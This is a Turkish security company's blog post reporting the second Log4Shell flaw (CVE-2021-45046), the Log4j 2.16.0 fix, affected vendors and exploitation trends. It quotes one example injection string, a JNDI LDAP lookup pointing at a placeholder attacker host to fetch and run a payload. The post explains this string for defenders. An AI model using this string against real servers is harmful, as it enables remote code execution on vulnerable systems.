OzzTech - İkinci Log4Shell Güvenlik Açığı

İkinci Log4Shell Güvenlik Açığı

İkinci Log4Shell Güvenlik Açığı

İkinci Log4Shell Güvenlik Açığı (CVE-2021-45046) Keşfedildi ve yeni yama yayınlandı.

Apache Software Foundation (ASF), yakın zamanda açıklanan Log4Shell istismarı için bir önceki yamanın "varsayılan olmayan bazı yapılandırmalarda eksik" olarak değerlendirilmesinin ardından Log4j günlük kaydı yardımcı programı için yeni bir düzeltme yayınladı.

CVE-2021-45046 olarak izlenen ikinci güvenlik açığı, CVSS derecelendirme sisteminde maksimum 10 üzerinden 3,7 olarak derecelendirilmiştir ve Log4j'nin 2.0-beta9'dan 2.12.1'e ve 2.13.0'dan 2.15.0'a kadar olan tüm sürümlerini etkiler. proje sahipleri, sistemlere sızmak ve sistemleri ele geçirmek için kötüye kullanılabilecek kritik bir uzaktan kod yürütme güvenlik açığını (CVE-2021-44228) ele almak için geçen hafta gönderdi.

ASF, yeni bir danışma belgesinde, CVE-2021-44228 için eksik olan yamanın "bir JNDI Arama modeli kullanarak bir hizmet reddi (DoS) saldırısıyla sonuçlanan kötü amaçlı girdi verileri oluşturmak" için kötüye kullanılabileceğini söyledi. Log4j'nin en son sürümü olan 2.16.0 (Java 8 veya sonraki bir sürümünü gerektiren kullanıcılar için), mesaj arama desteğini neredeyse tamamen kaldırır ve güvenlik açığının merkezinde yer alan bileşen olan JNDI'yi varsayılan olarak devre dışı bırakır. Java 7'ye ihtiyaç duyan kullanıcıların, kullanıma sunulduğunda Log4j 2.12.2 sürümüne yükseltmeleri önerilir.

ASF'den Ralph Goers, "CVE-2021-44228 ile uğraşmak JNDI'nin önemli güvenlik sorunları olduğunu gösterdi." "Bildiklerimizi azaltmış olsak da, özellikle büyük çoğunluğun kullanma olasılığı düşük olduğundan, kullanıcıların varsayılan olarak tamamen devre dışı bırakması daha güvenli olacaktır."dedi.

Java Adlandırma ve Dizin Arayüzü'nün kısaltması olan JNDI, programlama dilinde kodlanmış uygulamaların LDAP sunucuları gibi verileri ve kaynakları aramasını sağlayan bir Java API'sidir. Log4Shell, yaygın olarak Apache web sunucularına dahil edilen açık kaynaklı, Java tabanlı bir günlük kaydı çerçevesi olan Log4j kitaplığında bulunur.

Sorunun kendisi, LDAP bağlayıcısının JNDI bileşeni kötü amaçlı bir LDAP isteği enjekte etmek için kullanıldığında ortaya çıkar. "${jndi:ldap://attacker_controled_website/payload_to_be_executed}" gibi bir şey bu, güvenlik açığı bulunan sürümü çalıştıran bir web sunucusunda oturum açıldığında kitaplığın, bir düşmanın uzak bir etki alanından bir yük almasına ve yerel olarak yürütmesine olanak tanır.

En son güncelleme, kusurdan kaynaklanan "gerçek bir siber pandemi" ile sonuçlandığından, birkaç tehdit aktörünün Log4Shell'i, madeni para madencileri, uzaktan erişim truva atları ve fidye yazılımları dahil olmak üzere daha fazla saldırı için zemin hazırlayacak şekilde ele geçirmesiyle sonuçlandı. makineler. Fırsatçı izinsiz girişlerin en azından 1 Aralık'tan beri başladığı söyleniyor, ancak hata 9 Aralık'ta yaygın bir bilgi haline geldi.

Güvenlik açığı, Java uygulamalarında neredeyse her yerde kullanılan bir günlük kaydı çerçevesinde mevcut olduğundan ve kötü aktörlere dünya çapında milyonlarca cihaza sızmak ve bunları tehlikeye atmak için benzeri görülmemiş bir ağ geçidi sunduğu için yaygın bir alarma yol açtı.

Kuruluşlar için daha fazla sorun yaratan, uzaktan kullanılabilir kusur aynı zamanda Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google gibi bir dizi şirkete ait yüzlerce büyük kurumsal ürünü de etkiliyor. IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler ve Zoho, önemli bir yazılım tedarik zinciri riski oluşturuyor.

İsrailli güvenlik şirketi Check Point, "Bir veya sınırlı sayıda yazılım içeren diğer büyük siber saldırıların aksine, Log4j temelde her Java tabanlı ürüne veya web hizmetine gömülüdür. Bunu manuel olarak düzeltmek çok zordur." "Yamanın karmaşıklığı ve yararlanma kolaylığı nedeniyle bu güvenlik açığı, şirketler ve hizmetler bir koruma uygulayarak ürünlerine yönelik saldırıları önlemek için derhal harekete geçmedikçe, önümüzdeki yıllarda bizimle birlikte kalacak gibi görünüyor."diye ekledi.

Hatanın açıklanmasından sonraki günlerde, en az on farklı grup, istismar çoğunluğuna atladı ve küresel olarak kurumsal ağların kabaca %44'ü saldırıya uğradı, bu da önemli bir tırmanışa işaret ediyor. ABD Siber Güvenlik ve Altyapı Güvenlik Ajansı (CISA) da Log4Shell'i Bilinen İstismar Edilen Güvenlik Açıkları Kataloğu'na ekleyerek federal kurumlara güvenlik açığı için yamaları dahil etmeleri için 24 Aralık'a kadar süre tanıdı.

Sophos'ta kıdemli bir tehdit araştırmacısı olan Sean Gallagher, "düşmanların daha sonra para kazanmak veya bundan faydalanmak amacıyla şu anda elde edebilecekleri her şeye erişme ihtimalinin yüksek olduğu" konusunda uyardı ve "önce bir durgunluk var" diye ekledi.

Gallagher, "Savunmacılar için en acil öncelik, altyapılarının tüm köşelerini yamalayarak ve hafifleterek maruz kalmayı azaltmak ve açıkta kalan ve potansiyel olarak güvenliği ihlal edilmiş sistemleri araştırmaktır. Bu güvenlik açığı her yerde olabilir," diye ekledi.

Bu makale ilginizi çektiyse sizleri Log4Shell Güvenlik Açığı makalemize davet ediyoruz: https://www.ozztech.net/siber-guvenlik/log4shell-guvenlik-acigi/


İlginizi Çekebilecek Makaleler
FortiGate ACME Sertifika Desteği
Siber Güvenlik

FortiGate ACME Sertifika Desteği

Ocak 24, 2022 1:22

Otomatik Sertifika Yönetim Ortamı (ACME), RFC 8555’te tanımlandığı üzere, ücretsiz SSL sunucu sertifikaları sağlamak için genel Let’s...

Android Reverse Mühendisliği Araçları Örnek Vakalar
Siber Güvenlik

Android Reverse Mühendisliği Araçları Örnek Vakalar

Ocak 24, 2022 12:39

Bir önceki yazıda yeni çıkan android reverse mühendisliği araçları hakkında bilgi vermiştim. Bu yazımda...

Emotet Artık Alışılmadık IP Adreslerini Kullanıyor
Siber Güvenlik

Emotet Artık Alışılmadık IP Adreslerini Kullanıyor

Ocak 24, 2022 9:44

Emotet kötü amaçlı yazılım botnetinin dağıtımını içeren sosyal mühendislik kampanyaları, güvenlik çözümlerinin tespitinden kaçınmak...

FortiWeb Kurulumu 5-Operation Modu
Siber Güvenlik

FortiWeb Kurulumu 5-Operation Modu

Ocak 24, 2022 7:49

FortiWeb kurulumunu anlattığımız beşinci yazımızda operation modu ve FortiWeb cihazı açıldıktan sonra, FortiWeb cihazını...

FortiWeb Kurulumu 4- Admin Şifresi Değiştirme
Siber Güvenlik

FortiWeb Kurulumu 4- Admin Şifresi Değiştirme

Ocak 23, 2022 10:21

FortiWeb kurulumunu anlattığımız serinin dördüncü yazısında Admin şifresi nasıl değiştirceğinizi, saat ve günü nasıl...

Metasploittable 2
Siber Güvenlik

Metasploittable 2

Ocak 22, 2022 11:57

Metasploittable 2 Nedir? Neden Kullanılır? Nasıl Kurulur? Metasploittable 2 Metasploit firması tarafından bizlerin güvenli...

FortiWeb Kurulumu 3- Firmware Güncellenmesi
Siber Güvenlik

FortiWeb Kurulumu 3- Firmware Güncellenmesi

Ocak 22, 2022 11:56

FortiWeb kurulumunu anlattığımız serinin üçüncü yazısında Firmware güncellemesini anlatacağız. FortiWeb cihazınız gönderildiğinde en son...

FortiWeb Kurulumu 2- Web UI ve CLI Bağlama
Siber Güvenlik

FortiWeb Kurulumu 2- Web UI ve CLI Bağlama

Ocak 21, 2022 7:50

FortiWeb kurulumu yazımızın ikinci serisinde Web UI veya CLI bağlamanın nasıl yapılacağını anlatacağız. Eğer...

Yapay Zeka Nedir?
Yazılım Geliştirme

Yapay Zeka Nedir?

Ocak 20, 2022 10:57

Sürekli olarak değişen, gelişen ve oldukça hızlı bir şekilde boyut atlayan, günümüze kadar gelen...

İletişim
OZZTECH Bilgi Teknolojileri olarak siber güvenlik danışmanlığı ve bilgi güvenliği eğitimleri alanlarında 10 yılı aşkın bir süredir ülkemizin önde gelen kurumlarına hizmet vermeye devam etmektedir. Detaylı bilgi ve danışmanlık hizmetlerimiz için aşağıdaki formu kullanarak veya [email protected] adresimiz üzerinden bizlerle iletişime geçebilirsiniz.